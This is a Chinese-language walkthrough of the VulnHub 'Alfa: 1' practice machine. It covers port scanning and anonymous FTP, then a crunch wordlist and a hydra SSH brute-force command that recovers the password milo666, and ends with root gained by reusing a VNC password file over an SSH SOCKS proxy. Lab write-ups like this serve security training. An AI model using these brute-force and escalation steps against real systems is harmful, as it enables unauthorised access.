当前位置:网站首页>Alfa: 1 vulnhub walkthrough

Alfa: 1 vulnhub walkthrough

2022-08-02 03:25:00 xdeclearn

信息页:http://www.vulnhub.com/entry/alfa-1,655/
关键字:Enumeration | Web Application | Brute Force | Privilege Escalation

0x01 端口扫描

PORT      STATE SERVICE
21/tcp    open  ftp
80/tcp    open  http
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
65111/tcp open  unknown

0x02 获取第一个flag

使用anonymous访问ftp,获取到名为milo.jpg的图片。
milo
访问80端口,通过目录遍历,在页面http://192.168.56.157/alfa-support/中得到提示信息:
hint于是利用之前图片名通过crunch构建密码字典,hydra爆破得到密码milo666

[email protected]:~$ crunch 7 7 -t milo%%% > 1.txt
Crunch will now generate the following number of lines: 1000
[email protected]:~$ hydra -l thomas -P 1.txt ssh://192.168.56.157:65111
[65111][ssh] host: 192.168.56.157   login: thomas   password: milo666

利用ssh登录,得到第一个flag。
flag1

0x03 获取第二个flag

获取shell后一顿常规操作,比如suid,sudo,crontab,备份密码文件等,都以失败告终,反过来回到开始的地方,在用户目录中有一个敏感文件.remote_secret
secret
同时进程中存在vncserver。
vnc估计上述密码文件是用来登录vnc的,但是由于vncserver仅限本地登录,所以这里使用ssh做了socks5代理,在kali下利用vncview加载密码文件实现了root权限获取,得到了第二个flag。
root

原网站

版权声明
本文为[xdeclearn]所创,转载请带上原文链接,感谢
https://blog.csdn.net/xdeclearn/article/details/114630747

边栏推荐

猜你喜欢

随机推荐